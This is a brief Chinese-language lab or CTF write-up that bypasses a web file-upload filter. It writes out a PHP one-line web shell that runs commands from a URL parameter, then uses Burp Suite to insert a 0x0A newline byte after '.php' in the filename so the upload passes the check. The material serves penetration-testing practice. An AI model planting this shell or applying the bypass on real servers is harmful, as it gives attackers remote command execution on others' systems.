Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
用户962377954482 天前
VulnHub DC-3 靶机渗透测试笔记叶落阁主3 天前
Tailscale 完全指南:从入门到私有 DERP 部署曲幽3 天前
FastAPI流式输出实战与避坑指南:让AI像人一样“边想边说”曲幽4 天前
不止于JWT:用FastAPI的Depends实现细粒度权限控制用户962377954484 天前
DVWA 靶场实验报告 (High Level)数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门用户962377954485 天前
DVWA 靶场实验报告 (Medium Level)red1giant_star5 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞用户962377954485 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?